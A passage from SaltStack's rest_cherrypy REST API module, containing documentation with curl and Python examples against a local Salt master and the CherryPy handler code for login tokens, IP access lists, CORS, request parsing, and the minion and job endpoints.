automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running asynchronous jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
"""
import functools
import io
import itertools
import logging
import os
import signal
import tarfile
import time
from collections.abc import Iterator, Mapping
from multiprocessing import Pipe, Process
from urllib.parse import parse_qsl
import cherrypy # pylint: disable=import-error,3rd-party-module-not-gated
import salt
import salt.auth
import salt.exceptions
import salt.netapi
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
logger = logging.getLogger(__name__)
try:
from cherrypy.lib import ( # pylint: disable=import-error,3rd-party-module-not-gated
cpstats,
)
except AttributeError:
cpstats = None
logger.warning(
"Import of cherrypy.cpstats failed. Possible upstream bug: "
"https://github.com/cherrypy/cherrypy/issues/1444"
)
except ImportError:
cpstats = None
logger.warning("Import of cherrypy.cpstats failed.")
try:
# Imports related to websocket
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type("websockets", (object,), {"SynchronizingWebsocket": None})
HAS_WEBSOCKETS = False
def html_override_tool():
"""
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
"""
apiopts = cherrypy.config["apiopts"]
request = cherrypy.request
url_blacklist = (
apiopts.get("app_path", "/app"),
apiopts.get("static_path", "/static"),
)
if "app" not in cherrypy.config["apiopts"]:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get("Accept") == "*/*":
return
try:
wants_html = cherrypy.lib.cptools.accept("text/html")
except cherrypy.HTTPError:
return
else:
if wants_html != "text/html":
return
raise cherrypy.InternalRedirect(apiopts.get("app_path", "/app"))
def salt_token_tool():
"""
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
"""
x_auth = cherrypy.request.headers.get("X-Auth-Token", None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie["session_id"] = x_auth
def salt_api_acl_tool(username, request):
"""
.. versionadded:: 2016.3.0
Verifies user requests against the API whitelist. (User/IP pair)
in order to provide whitelisting for the API similar to the
master, but over the API.
.. code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
"""
failure_str = "[api_acl] Authentication failed for " "user %s from IP %s"
success_str = "[api_acl] Authentication successful for user %s from IP %s"
pass_str = "[api_acl] Authentication not checked for " "user %s from IP %s"
acl = None
# Salt Configuration
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get("api_acl", None)
ip = request.remote.ip
if acl:
users = acl.get("users", {})
if users:
if username in users:
if ip in users[username] or "*" in users[username]:
logger.info(success_str, username, ip)
return True
else:
logger.info(failure_str, username, ip)
return False
elif username not in users and "*" in users:
if ip in users["*"] or "*" in users["*"]:
logger.info(success_str, username, ip)
return True
else:
logger.info(failure_str, username, ip)
return False
else:
logger.info(failure_str, username, ip)
return False
else:
logger.info(pass_str, username, ip)
return True
def salt_ip_verify_tool():
"""
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
"""
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get("authorized_ips", None)
if auth_ip_list:
logger.debug("Found IP list: %s", auth_ip_list)
rem_ip = cherrypy.request.headers.get("Remote-Addr", None)
logger.debug("Request from IP: %s", rem_ip)
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: %s", rem_ip)
raise cherrypy.HTTPError(403, "Bad IP")
def salt_auth_tool():
"""
Redirect all unauthenticated requests to the login page
"""
# Redirect to the login page if the session hasn't been authed
if "token" not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers["Cache-Control"] = "private"
def cors_tool():
"""
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
"""
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head["Access-Control-Allow-Origin"] = req_head.get("Origin", "*")
resp_head["Access-Control-Expose-Headers"] = "GET, POST"
resp_head["Access-Control-Allow-Credentials"] = "true"
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == "OPTIONS":
ac_method = req_head.get("Access-Control-Request-Method", None)
allowed_methods = ["GET", "POST"]
allowed_headers = [
"Content-Type",
"X-Auth-Token",
"X-Requested-With",
]
if ac_method and ac_method in allowed_methods:
resp_head["Access-Control-Allow-Methods"] = ", ".join(allowed_methods)
resp_head["Access-Control-Allow-Headers"] = ", ".join(allowed_headers)
resp_head["Connection"] = "keep-alive"
resp_head["Access-Control-Max-Age"] = "1400"
# Note: CherryPy on Py3 uses binary objects for the response
# Python 2.6 also supports the byte prefix, so no need for conditionals
cherrypy.response.body = b""
cherrypy.response.status = 200
# CORS requests should short-circuit the other tools.
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session["token"] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
("application/json", salt.utils.json.dumps),
(
"application/x-yaml",
functools.partial(salt.utils.yaml.safe_dump, default_flow_style=False),
),
)
def hypermedia_handler(*args, **kwargs):
"""
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
"""
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (
salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError,
):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (
salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError,
) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc: # pylint: disable=broad-except
# The TimeoutError exception class was removed in CherryPy in 12.0.0, but
# Still check existence of TimeoutError and handle in CherryPy < 12.
# The check was moved down from the SaltClientTimeout error line because
# A one-line if statement throws a BaseException inheritance TypeError.
if hasattr(cherrypy, "TimeoutError") and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug(
"Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True,
)
cherrypy.response.status = 500
ret = {
"status": cherrypy.response.status,
"return": "{}".format(traceback.format_exc())
if cherrypy.config["debug"]
else "An unexpected error occurred",
}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers["Content-Type"] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
return salt.utils.stringutils.to_bytes(response)
except Exception: # pylint: disable=broad-except
msg = "Could not serialize the return data from Salt."
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
"""
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
"""
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
"""
A decorator to skip a processor function if process_request_body is False
"""
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
"""
Accept x-www-form-urlencoded data and reformat it into a Low State
data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
"""
# cherrypy._cpreqbody.process_urlencoded doesn't preserve the raw
# "body", so we have to handle parsing the tokens using parse_qsl
urlencoded = entity.read()
try:
urlencoded = urlencoded.decode("utf-8")
except (UnicodeDecodeError, AttributeError):
pass
cherrypy.serving.request.raw_body = urlencoded
unserialized_data = {}
for key, val in parse_qsl(urlencoded):
unserialized_data.setdefault(key, []).append(val)
for key, val in unserialized_data.items():
if len(val) == 1:
unserialized_data[key] = val[0]
if len(val) == 0:
unserialized_data[key] = ""
cherrypy.serving.request.unserialized_data = unserialized_data
@process_request_body
def json_processor(entity):
"""
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid JSON document")
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
"""
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid YAML document")
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
"""
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
"""
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
"""
# Be liberal in what you accept
ct_in_map = {
"application/x-www-form-urlencoded": urlencoded_processor,
"application/json": json_processor,
"application/x-yaml": yaml_processor,
"text/yaml": yaml_processor,
"text/plain": text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (
cherrypy.request.method.upper() == "POST"
and cherrypy.request.headers.get("Content-Length", "0") == "0"
):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, "Content type not supported"
)
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
"""
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
"""
if cherrypy.request.method.upper() != "POST":
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, Mapping):
# Make the 'arg' param a list if not already
if "arg" in data and not isinstance(
data["arg"], list
): # pylint: disable=unsupported-membership-test
data["arg"] = [data["arg"]]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
tools_config = {
"on_start_resource": [
("html_override", html_override_tool),
("salt_token", salt_token_tool),
],
"before_request_body": [
("cors_tool", cors_tool),
("salt_auth", salt_auth_tool),
("hypermedia_in", hypermedia_in),
],
"before_handler": [
("lowdata_fmt", lowdata_fmt),
("hypermedia_out", hypermedia_out),
("salt_ip_verify", salt_ip_verify_tool),
],
}
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(
cherrypy.tools, tool_name, cherrypy.Tool(hook, tool_fn, priority=(50 + idx))
)
###############################################################################
class LowDataAdapter:
"""
The primary entry point to Salt's REST API
"""
exposed = True
_cp_config = {
"tools.salt_token.on": True,
"tools.sessions.on": True,
"tools.sessions.timeout": 60 * 10, # 10 hours
# 'tools.autovary.on': True,
"tools.hypermedia_out.on": True,
"tools.hypermedia_in.on": True,
"tools.lowdata_fmt.on": True,
"tools.salt_ip_verify.on": True,
}
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
"""
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
"""
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, "Lowstates must be a list")
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk["token"] = token
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if client:
chunk["client"] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if "arg" in chunk and not isinstance(chunk["arg"], list):
chunk["arg"] = [chunk["arg"]]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, Iterator):
yield from ret
else:
yield ret
@cherrypy.config(**{"tools.sessions.on": False})
def GET(self):
"""
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: text
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
"""
return {
"return": "Welcome",
"clients": salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
"""
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
"""
return {"return": list(self.exec_lowstate(token=cherrypy.session.get("token")))}
class Minions(LowDataAdapter):
"""
Convenience URLs for working with minions
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: text
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
"""
cherrypy.request.lowstate = [
{"client": "local", "tgt": mid or "*", "fun": "grains.items"}
]
return {
"return": list(self.exec_lowstate(token=cherrypy.session.get("token"))),
}
def POST(self, **kwargs):
"""
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
Lowstate data describing Salt commands must be sent in the request
body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: text
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: text
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
"""
job_data = list(
self.exec_lowstate(
client="local_async", token=cherrypy.session.get("token")
)
)
cherrypy.response.status = 202
return {
"return": job_data,
"_links": {
"jobs": [{"href": "/jobs/{}".format(i["jid"])} for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, jid=None, timeout=""): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: text
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: text
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
"""
lowstate = {"client": "runner"}
if jid:
lowstate.update({"fun": "jobs.list_job", "jid": jid})
else:
lowstate.update({"fun": "jobs.list_jobs"})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(token=cherrypy.session.get("token")))
ret = {}
if jid:
ret["info"] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get("Result")
for minion in returns:
if "return" in returns[minion]:
minion_ret[minion] = returns[minion].get("return")
else:
minion_ret[minion] = returns[minion].get("return")
ret["return"] = [minion_ret]
else:
ret["return"] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
"""
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
"""
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
